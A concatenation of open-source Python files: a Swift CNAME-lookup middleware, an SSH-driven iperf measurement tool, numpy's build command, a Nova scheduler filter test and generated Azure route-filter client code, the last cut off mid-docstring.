# limitations under the License.
"""
CNAME Lookup Middleware
Middleware that translates an unknown domain in the host header to
something that ends with the configured storage_domain by looking up
the given domain's CNAME record in DNS.
This middleware will continue to follow a CNAME chain in DNS until it finds
a record ending in the configured storage domain or it reaches the configured
maximum lookup depth. If a match is found, the environment's Host header is
rewritten and the request is passed further down the WSGI chain.
"""
from six.moves import range
import socket
from swift import gettext_ as _
try:
import dns.resolver
from dns.exception import DNSException
from dns.resolver import NXDOMAIN, NoAnswer
except ImportError:
# catch this to allow docs to be built without the dependency
MODULE_DEPENDENCY_MET = False
else: # executed if the try block finishes with no errors
MODULE_DEPENDENCY_MET = True
from swift.common.swob import Request, HTTPBadRequest
from swift.common.utils import cache_from_env, get_logger, list_from_csv
def lookup_cname(domain):  # pragma: no cover
    """
    Given a domain, returns its DNS CNAME mapping and DNS ttl.

    :param domain: domain to query on
    :returns: (ttl, result) -- (0, None) when no CNAME record exists
              or the lookup fails
    """
    try:
        rrset = dns.resolver.query(domain, 'CNAME').rrset
        target = rrset.items[0].to_text().rstrip('.')
    except (DNSException, NXDOMAIN, NoAnswer):
        return 0, None
    return rrset.ttl, target
def is_ip(domain):
    """Return True if *domain* parses as a literal IPv4 or IPv6 address."""
    for family in (socket.AF_INET, socket.AF_INET6):
        try:
            socket.inet_pton(family, domain)
        except socket.error:
            continue
        return True
    return False
class CNAMELookupMiddleware(object):
    """
    CNAME Lookup Middleware

    See above for a full description.

    :param app: The next WSGI filter or app in the paste.deploy
                chain.
    :param conf: The configuration dict for the middleware.
    """

    def __init__(self, app, conf):
        if not MODULE_DEPENDENCY_MET:
            # reraise the exception if the dependency wasn't met
            raise ImportError('dnspython is required for this module')
        self.app = app
        storage_domain = conf.get('storage_domain', 'example.com')
        # Normalize every configured domain to start with a dot so that
        # the endswith() check below can never match a partial label
        # (e.g. 'badexample.com' must not match 'example.com').
        self.storage_domain = ['.' + s for s in
                               list_from_csv(storage_domain)
                               if not s.startswith('.')]
        self.storage_domain += [s for s in list_from_csv(storage_domain)
                                if s.startswith('.')]
        self.lookup_depth = int(conf.get('lookup_depth', '1'))
        # Memcache client is resolved lazily from the WSGI environment on
        # the first request; it is not available at filter-init time.
        self.memcache = None
        self.logger = get_logger(conf, log_route='cname-lookup')

    def _domain_endswith_in_storage_domain(self, a_domain):
        """Return True if *a_domain* ends with any configured storage domain."""
        for domain in self.storage_domain:
            if a_domain.endswith(domain):
                return True
        return False

    def __call__(self, env, start_response):
        if not self.storage_domain:
            return self.app(env, start_response)
        if 'HTTP_HOST' in env:
            given_domain = env['HTTP_HOST']
        else:
            given_domain = env['SERVER_NAME']
        port = ''
        if ':' in given_domain:
            given_domain, port = given_domain.rsplit(':', 1)
        if is_ip(given_domain):
            # Literal IPs cannot have CNAME records; pass straight through.
            return self.app(env, start_response)
        a_domain = given_domain
        if not self._domain_endswith_in_storage_domain(a_domain):
            if self.memcache is None:
                self.memcache = cache_from_env(env)
            error = True
            for tries in range(self.lookup_depth):
                found_domain = None
                if self.memcache:
                    memcache_key = ''.join(['cname-', a_domain])
                    found_domain = self.memcache.get(memcache_key)
                if not found_domain:
                    ttl, found_domain = lookup_cname(a_domain)
                    if self.memcache:
                        # BUGFIX: cache the result under the domain that was
                        # actually resolved (a_domain), not the original
                        # given_domain.  The old code keyed every hop of a
                        # CNAME chain on given_domain, so deeper hops
                        # overwrote the original domain's cache entry and
                        # the per-hop cache reads above (keyed on a_domain)
                        # never hit the cache.
                        memcache_key = ''.join(['cname-', a_domain])
                        self.memcache.set(memcache_key, found_domain,
                                          time=ttl)
                if found_domain is None or found_domain == a_domain:
                    # no CNAME records or we're at the last lookup
                    error = True
                    found_domain = None
                    break
                elif self._domain_endswith_in_storage_domain(found_domain):
                    # Found it!
                    self.logger.info(
                        _('Mapped %(given_domain)s to %(found_domain)s') %
                        {'given_domain': given_domain,
                         'found_domain': found_domain})
                    if port:
                        env['HTTP_HOST'] = ':'.join([found_domain, port])
                    else:
                        env['HTTP_HOST'] = found_domain
                    error = False
                    break
                else:
                    # try one more deep in the chain
                    self.logger.debug(
                        _('Following CNAME chain for '
                          '%(given_domain)s to %(found_domain)s') %
                        {'given_domain': given_domain,
                         'found_domain': found_domain})
                    a_domain = found_domain
            if error:
                if found_domain:
                    msg = 'CNAME lookup failed after %d tries' % \
                        self.lookup_depth
                else:
                    msg = 'CNAME lookup failed to resolve to a valid domain'
                resp = HTTPBadRequest(request=Request(env), body=msg,
                                      content_type='text/plain')
                return resp(env, start_response)
        return self.app(env, start_response)
def filter_factory(global_conf, **local_conf):  # pragma: no cover
    """paste.deploy entry point: build a CNAMELookupMiddleware factory.

    Local (filter-section) settings override the global paste config.
    """
    conf = {}
    conf.update(global_conf)
    conf.update(local_conf)

    def cname_filter(app):
        return CNAMELookupMiddleware(app, conf)

    return cname_filter
| apache-2.0 |
netgroup/Dreamer-Measurements-Tools | iperf_nodes.py | 1 | 3471 | #!/usr/bin/python
import sys
import paramiko
import cmd
import re
from subprocess import Popen
from threading import Thread
from time import sleep
import os
class iperfNode(object):
    """Base class: an SSH-reachable host on which iperf commands are run.

    Opens an SSH connection (via paramiko) on construction and mirrors all
    remote output to ./log/<host>.log.

    NOTE: this module targets Python 2 (the octal literal 0755 below is
    Python 2 syntax).
    """

    def __init__(self, host, user, pwd):
        # SSH endpoint and credentials.
        self.host = host
        self.user = user
        self.pwd = pwd
        self.chan = None     # interactive paramiko channel, set by connect()
        self.conn = None     # paramiko SSHClient, set by connect()
        self.process = None  # optional local subprocess, terminated in close()
        path = "log/"
        if os.path.exists(path) == False:
            os.mkdir(path, 0755)
        # One log file per host; remove any stale log from a previous run.
        path_log = "./log/%s.log" % host
        if os.path.exists(path_log):
            os.remove(path_log)
        self.log = open( path_log, "a")
        self.STOP = False      # set by close() to abort wait_command()
        self.return_data = ""  # raw output of the last run() command
        self.t_connect()

    def t_connect(self):
        """Run connect() in a thread and wait for it to finish.

        NOTE(review): the thread is joined immediately, so this is
        effectively a synchronous call -- presumably kept for symmetry
        with the other threaded operations; confirm before simplifying.
        """
        self.conn_thread = Thread( target=self.connect)
        self.conn_thread.start()
        self.conn_thread.join()

    def connect(self):
        """Open the SSH connection and an interactive shell channel."""
        self.conn = paramiko.SSHClient()
        self.conn.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        self.conn.connect(self.host,username=self.user, password=self.pwd)
        self.chan = self.conn.invoke_shell()
        # Consume the login banner up to the first shell prompt.
        self.wait_command('',False)

    def run(self, command, verbose=True):
        """Send *command* over the interactive shell and collect its output.

        The collected output is stored in self.return_data and, when
        *verbose*, appended to the per-host log file.
        """
        buff = ''
        self.chan.send(command+"\r")
        buff = self.wait_command(command, verbose)
        self.return_data = buff

    def exe(self, command):
        """Run *command* in a fresh non-interactive SSH session and return
        its stdout as a newline-terminated string."""
        buff = ''
        stdin, stdout, stderr = self.conn.exec_command(command)
        stdin.close()
        for line in stdout.read().splitlines():
            buff+= line+'\n'
        return buff

    def wait_command(self,command, verbose):
        """Read from the shell channel until a shell prompt appears or STOP
        is set; return everything read.

        A prompt is detected as either '# ' preceded by a non-'#' character
        (root shells) or '$ ' (user shells).
        """
        buff = ''
        i = 0  # unused
        s = re.compile('[^#]# ')  # root-style prompt
        u = re.compile('[$] ')    # user-style prompt
        while not u.search(buff) and not s.search(buff) and self.STOP == False:
            resp = self.chan.recv(9999)
            if (verbose):
                self.log.write(resp)
            buff += resp
        if (verbose):
            self.log.write("\n")
        return buff

    def close(self):
        """Abort any pending read, close the SSH connection, any local
        subprocess, and the log file."""
        self.STOP = True
        if self.conn != None:
            self.conn.close()
        if self.process:
            self.process.terminate()
        self.log.close()
class iperfClient(iperfNode):
    """iperf UDP traffic generator driven over SSH.

    *params* is a sequence: (host, ssh_user, ssh_password, iperf_server_ip).
    """

    # iperf command-line fragments shared by every client instance.
    UDP = "-u"
    DGRAMSIZE= "-l 1000"
    BUFFSIZE= "-w 256k"

    def __init__(self, params):
        iperfNode.__init__(self, params[0], params[1], params[2])
        self.op_thread = None    # background thread running the iperf command
        self.server = params[3]  # address of the iperf server to target

    def start(self, length, rate):
        """Start an iperf client run of *length* seconds at *rate* Mbit/s
        in a background thread (non-blocking; see join())."""
        server = "-c %s" % self.server
        length = "-t %s" % length
        rate = "-b %sm" % rate
        params = "iperf %s %s %s %s %s %s" % (server, self.UDP, rate, self.DGRAMSIZE, length, self.BUFFSIZE)
        self.op_thread = Thread(target = self.iperf, args=(params,))
        self.op_thread.start()

    def join(self):
        """Block until the running iperf client terminates."""
        self.op_thread.join()

    def iperf(self, params):
        # Visual separator in the log file between successive runs.
        self.log.write("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n")
        iperfNode.run(self, params, True)

    def getLoss(self):
        """Parse the datagram-loss percentage from the last run's output.

        Returns the number as a string, or "N/A" when no match is found.
        """
        # Matches e.g. "0.53%"; the '.' is unescaped but in practice only
        # ever matches the literal decimal point between the digit runs.
        p_loss = re.compile('[0-9]*.[0-9]*%')
        match = p_loss.search(self.return_data)
        if match == None:
            return "N/A"
        s = (match.group(0).replace("%",""))
        # iperf prints loss as "(0.53%)"; strip a captured leading '('.
        if "(" in s:
            return s[1:]
        return s

    def getJitter(self):
        """Parse the jitter (in ms) from the last run's output.

        Returns the number as a string, or "N/A" when no match is found.
        """
        p_ms = re.compile('[0-9]*.[0-9]* ms')
        match = p_ms.search(self.return_data)
        if match == None:
            return "N/A"
        return (match.group(0).replace(" ms",""))
class iperfServer(iperfNode):
    """SSH-driven iperf UDP server endpoint."""

    # iperf command-line fragments shared by every server instance.
    UDP = "-u"
    DGRAMSIZE = "-l 1000"
    BUFFSIZE = "-w 256k"

    def __init__(self, params):
        host, user, pwd = params[0], params[1], params[2]
        iperfNode.__init__(self, host, user, pwd)
        self.op_thread = None

    def start(self):
        """Launch 'iperf -s' on the remote node in a background thread."""
        command = "iperf -s %s %s %s" % (self.UDP, self.DGRAMSIZE, self.BUFFSIZE)
        self.op_thread = Thread(target=self.iperf, args=(command,))
        self.op_thread.start()

    def iperf(self, params):
        iperfNode.run(self, params, True)

    def close(self):
        """Stop the node, then wait for the iperf thread to finish."""
        iperfNode.close(self)
        self.op_thread.join()
| apache-2.0 |
madphysicist/numpy | numpy/distutils/command/build.py | 10 | 2566 | import os
import sys
from distutils.command.build import build as old_build
from distutils.util import get_platform
from numpy.distutils.command.config_compiler import show_fortran_compilers
class build(old_build):
    """numpy's extension of the distutils 'build' command.

    Adds Fortran-compiler selection and CPU-optimization options, and
    inserts the config_cc/config_fc/build_src sub-commands ahead of the
    standard distutils build steps.
    """

    # Extra sub-commands run before the standard distutils ones;
    # build_src only runs when the distribution has extension modules.
    sub_commands = [('config_cc', lambda *args: True),
                    ('config_fc', lambda *args: True),
                    ('build_src', old_build.has_ext_modules),
                    ] + old_build.sub_commands

    # (long-option, short-option, help-text) triples; distutils maps each
    # entry to a same-named attribute ('-' becomes '_').
    user_options = old_build.user_options + [
        ('fcompiler=', None,
         "specify the Fortran compiler type"),
        ('warn-error', None,
         "turn all warnings into errors (-Werror)"),
        ('cpu-baseline=', None,
         "specify a list of enabled baseline CPU optimizations"),
        ('cpu-dispatch=', None,
         "specify a list of dispatched CPU optimizations"),
        ('disable-optimization', None,
         "disable CPU optimized code(dispatch,simd,fast...)"),
        ('simd-test=', None,
         "specify a list of CPU optimizations to be tested against NumPy SIMD interface"),
        ]

    help_options = old_build.help_options + [
        ('help-fcompiler', None, "list available Fortran compilers",
         show_fortran_compilers),
        ]

    def initialize_options(self):
        """Set defaults for the options declared in user_options above."""
        old_build.initialize_options(self)
        self.fcompiler = None
        self.warn_error = False
        self.cpu_baseline = "min"
        self.cpu_dispatch = "max -xop -fma4" # drop AMD legacy features by default
        self.disable_optimization = False
        """
        the '_simd' module is a very large. Adding more dispatched features
        will increase binary size and compile time. By default we minimize
        the targeted features to those most commonly used by the NumPy SIMD interface(NPYV),
        NOTE: any specified features will be ignored if they're:
            - part of the baseline(--cpu-baseline)
            - not part of dispatch-able features(--cpu-dispatch)
            - not supported by compiler or platform
        """
        self.simd_test = "BASELINE SSE2 SSE42 XOP FMA4 (FMA3 AVX2) AVX512F AVX512_SKX VSX VSX2 VSX3 NEON ASIMD"

    def finalize_options(self):
        """Resolve build_scripts to a platform-specific directory name.

        Mirrors distutils' naming for the other build dirs, e.g.
        'scripts.linux-x86_64-3.9'.
        """
        build_scripts = self.build_scripts
        old_build.finalize_options(self)
        plat_specifier = ".{}-{}.{}".format(get_platform(), *sys.version_info[:2])
        if build_scripts is None:
            self.build_scripts = os.path.join(self.build_base,
                                              'scripts' + plat_specifier)

    def run(self):
        old_build.run(self)
| bsd-3-clause |
alvarolopez/nova | nova/tests/unit/scheduler/filters/test_aggregate_instance_extra_specs_filters.py | 56 | 3683 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova.scheduler.filters import aggregate_instance_extra_specs as agg_specs
from nova import test
from nova.tests.unit.scheduler import fakes
@mock.patch('nova.scheduler.filters.utils.aggregate_metadata_get_by_host')
class TestAggregateInstanceExtraSpecsFilter(test.NoDBTestCase):
    """Exercise AggregateInstanceExtraSpecsFilter's host_passes logic."""

    def setUp(self):
        super(TestAggregateInstanceExtraSpecsFilter, self).setUp()
        self.filt_cls = agg_specs.AggregateInstanceExtraSpecsFilter()

    def _do_test_aggregate_filter_extra_specs(self, especs, passes):
        """Run host_passes for a flavor carrying *especs*; check the verdict."""
        instance_type = {'memory_mb': 1024, 'extra_specs': especs}
        filter_properties = {'context': mock.sentinel.ctx,
                             'instance_type': instance_type}
        host = fakes.FakeHostState('host1', 'node1', {'free_ram_mb': 1024})
        result = self.filt_cls.host_passes(host, filter_properties)
        if passes:
            self.assertTrue(result)
        else:
            self.assertFalse(result)

    def test_aggregate_filter_passes_no_extra_specs(self, agg_mock):
        # A flavor without extra_specs passes without touching aggregates.
        caps = {'opt1': 1, 'opt2': 2}
        filter_properties = {'context': mock.sentinel.ctx,
                             'instance_type': {'memory_mb': 1024}}
        host = fakes.FakeHostState('host1', 'node1', caps)
        self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
        self.assertFalse(agg_mock.called)

    def test_aggregate_filter_passes_extra_specs_simple(self, agg_mock):
        agg_mock.return_value = {'opt1': '1', 'opt2': '2'}
        # 'opt1' is un-scoped, 'aggregate_instance_extra_specs:opt2' is
        # scoped to this filter, and 'trust:trusted_host' belongs to a
        # different filter and must be ignored.
        self._do_test_aggregate_filter_extra_specs(
            {'opt1': '1',
             'aggregate_instance_extra_specs:opt2': '2',
             'trust:trusted_host': 'true'},
            passes=True)

    def test_aggregate_filter_passes_extra_specs_simple_comma(self, agg_mock):
        agg_mock.return_value = {'opt1': '1,3', 'opt2': '2'}
        # A comma-separated aggregate value matches any of its alternatives.
        self._do_test_aggregate_filter_extra_specs(
            {'opt1': '1',
             'aggregate_instance_extra_specs:opt1': '3',
             'trust:trusted_host': 'true'},
            passes=True)

    def test_aggregate_filter_passes_with_key_same_as_scope(self, agg_mock):
        agg_mock.return_value = {'aggregate_instance_extra_specs': '1'}
        # An un-scoped key that happens to equal our scope name must not
        # blow up the filter.
        self._do_test_aggregate_filter_extra_specs(
            {'aggregate_instance_extra_specs': '1'},
            passes=True)

    def test_aggregate_filter_fails_extra_specs_simple(self, agg_mock):
        agg_mock.return_value = {'opt1': '1', 'opt2': '2'}
        # 'opt2' mismatches the aggregate metadata, so the host fails.
        self._do_test_aggregate_filter_extra_specs(
            {'opt1': '1',
             'opt2': '222',
             'trust:trusted_host': 'true'},
            passes=False)
| apache-2.0 |
AutorestCI/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_08_01/operations/route_filters_operations.py | 1 | 25552 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.exceptions import DeserializationError
from msrestazure.azure_operation import AzureOperationPoller
from .. import models
class RouteFiltersOperations(object):
    """RouteFiltersOperations operations.

    NOTE: this class is generated by AutoRest; manual edits are lost when
    the client is regenerated.

    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    :ivar api_version: Client API version. Constant value: "2017-08-01".
    """

    models = models

    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        # Pinned REST API version sent with every request.
        self.api_version = "2017-08-01"
        self.config = config

    def _delete_initial(
            self, resource_group_name, route_filter_name, custom_headers=None, raw=False, **operation_config):
        # Internal helper: issues the initial DELETE request; long-running
        # polling is handled by the public delete() wrapper.
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.delete(url, query_parameters)
        response = self._client.send(request, header_parameters, stream=False, **operation_config)

        if response.status_code not in [200, 202, 204]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    def delete(
            self, resource_group_name, route_filter_name, custom_headers=None, raw=False, **operation_config):
        """Deletes the specified route filter.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param route_filter_name: The name of the route filter.
        :type route_filter_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :return: An instance of AzureOperationPoller that returns None or
         ClientRawResponse if raw=true
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._delete_initial(
            resource_group_name=resource_group_name,
            route_filter_name=route_filter_name,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )
        if raw:
            return raw_result

        # Construct and send request
        def long_running_send():
            # The initial request was already sent above; hand its response
            # to the poller.
            return raw_result.response

        def get_long_running_status(status_link, headers=None):
            # Poll the Azure-provided status link, propagating the original
            # client request id for server-side correlation.
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            header_parameters = {}
            header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
            return self._client.send(
                request, header_parameters, stream=False, **operation_config)

        def get_long_running_output(response):
            if response.status_code not in [200, 202, 204]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)

    def get(
            self, resource_group_name, route_filter_name, expand=None, custom_headers=None, raw=False, **operation_config):
        """Gets the specified route filter.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param route_filter_name: The name of the route filter.
        :type route_filter_name: str
        :param expand: Expands referenced express route bgp peering resources.
        :type expand: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: RouteFilter or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.network.v2017_08_01.models.RouteFilter or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
        if expand is not None:
            query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters)
        response = self._client.send(request, header_parameters, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('RouteFilter', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def _create_or_update_initial(
            self, resource_group_name, route_filter_name, route_filter_parameters, custom_headers=None, raw=False, **operation_config):
        # Internal helper: issues the initial PUT request; long-running
        # polling is handled by the public create_or_update() wrapper.
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(route_filter_parameters, 'RouteFilter')

        # Construct and send request
        request = self._client.put(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, stream=False, **operation_config)

        if response.status_code not in [200, 201]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('RouteFilter', response)
        if response.status_code == 201:
            deserialized = self._deserialize('RouteFilter', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def create_or_update(
            self, resource_group_name, route_filter_name, route_filter_parameters, custom_headers=None, raw=False, **operation_config):
        """Creates or updates a route filter in a specified resource group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param route_filter_name: The name of the route filter.
        :type route_filter_name: str
        :param route_filter_parameters: Parameters supplied to the create or
         update route filter operation.
        :type route_filter_parameters:
         ~azure.mgmt.network.v2017_08_01.models.RouteFilter
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :return: An instance of AzureOperationPoller that returns RouteFilter
         or ClientRawResponse if raw=true
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_08_01.models.RouteFilter]
         or ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._create_or_update_initial(
            resource_group_name=resource_group_name,
            route_filter_name=route_filter_name,
            route_filter_parameters=route_filter_parameters,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )
        if raw:
            return raw_result

        # Construct and send request
        def long_running_send():
            # The initial request was already sent above; hand its response
            # to the poller.
            return raw_result.response

        def get_long_running_status(status_link, headers=None):
            # Poll the Azure-provided status link, propagating the original
            # client request id for server-side correlation.
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            header_parameters = {}
            header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
            return self._client.send(
                request, header_parameters, stream=False, **operation_config)

        def get_long_running_output(response):
            if response.status_code not in [200, 201]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            deserialized = self._deserialize('RouteFilter', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)

    def _update_initial(
            self, resource_group_name, route_filter_name, route_filter_parameters, custom_headers=None, raw=False, **operation_config):
        # Internal helper: issues the initial PATCH request; long-running
        # polling is handled by the public update() wrapper.
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(route_filter_parameters, 'PatchRouteFilter')

        # Construct and send request
        request = self._client.patch(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('RouteFilter', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def update(
            self, resource_group_name, route_filter_name, route_filter_parameters, custom_headers=None, raw=False, **operation_config):
        """Updates a route filter in a specified resource group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param route_filter_name: The name of the route filter.
        :type route_filter_name: str
        :param route_filter_parameters: Parameters supplied to the update
         route filter operation.
        :type route_filter_parameters:
         ~azure.mgmt.network.v2017_08_01.models.PatchRouteFilter
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :return: An instance of AzureOperationPoller that returns RouteFilter
         or ClientRawResponse if raw=true
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_08_01.models.RouteFilter]
         or ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._update_initial(
            resource_group_name=resource_group_name,
            route_filter_name=route_filter_name,
            route_filter_parameters=route_filter_parameters,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )
        if raw:
            return raw_result

        # Construct and send request
        def long_running_send():
            # The initial request was already sent above; hand its response
            # to the poller.
            return raw_result.response

        def get_long_running_status(status_link, headers=None):
            # Poll the Azure-provided status link, propagating the original
            # client request id for server-side correlation.
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            header_parameters = {}
            header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
            return self._client.send(
                request, header_parameters, stream=False, **operation_config)

        def get_long_running_output(response):
            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            deserialized = self._deserialize('RouteFilter', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)

    def list_by_resource_group(
            self, resource_group_name, custom_headers=None, raw=False, **operation_config):
        """Gets all route filters in a resource group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
